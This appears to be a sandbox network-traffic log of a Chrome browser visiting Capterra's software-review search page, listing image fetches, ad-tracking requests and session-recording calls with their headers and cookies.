        Source: global trafficHTTP traffic detected: GET /ProductLogo/bcf1f306-bfbc-4489-9efe-4cea2b273e4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e60c0fa1-f0d4-40ac-a412-0b2261b1f9a0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/537ec30a-379d-42ed-9912-75af8cb47205.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/44e20468-ea22-4d70-9132-b88c151348b5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/82a342f4-1d08-4265-877a-83f0d7b3858f.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/3f97e69e-54a0-4b38-95b7-c226481cff4c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/464cd3be-e2b8-4f9b-a572-577e31770f58.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ant_squire HTTP/1.1Host: d-ipv6.mmapiws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source;navigation-sourceReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034620739&cv=11&fst=1725034620739&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8036043.fls.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/rec/page HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/db285424-c32d-461f-9382-c24a52b4c2ef.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f5157b6b-4b64-4b26-9928-cdc78f98b182.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a5d35bcd-e674-49ae-b851-7c2579a7969f.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/bcf1f306-bfbc-4489-9efe-4cea2b273e4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/98ca9b83-b6bd-4a44-92d1-63c526d17630.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f94dcf3a-e9ef-4673-80a0-d25bd50a393d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/537ec30a-379d-42ed-9912-75af8cb47205.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/464cd3be-e2b8-4f9b-a572-577e31770f58.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f5157b6b-4b64-4b26-9928-cdc78f98b182.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/67711109-055d-46d1-bf60-43ba35ef896d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/9f57a44f-9475-4cc5-9886-3822c18b54d1.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f0d90c26-fb48-482e-bfed-fd16809bc437.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f94dcf3a-e9ef-4673-80a0-d25bd50a393d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/442879c8-fca4-4a7c-b165-49dc05cf7999.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/98ca9b83-b6bd-4a44-92d1-63c526d17630.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
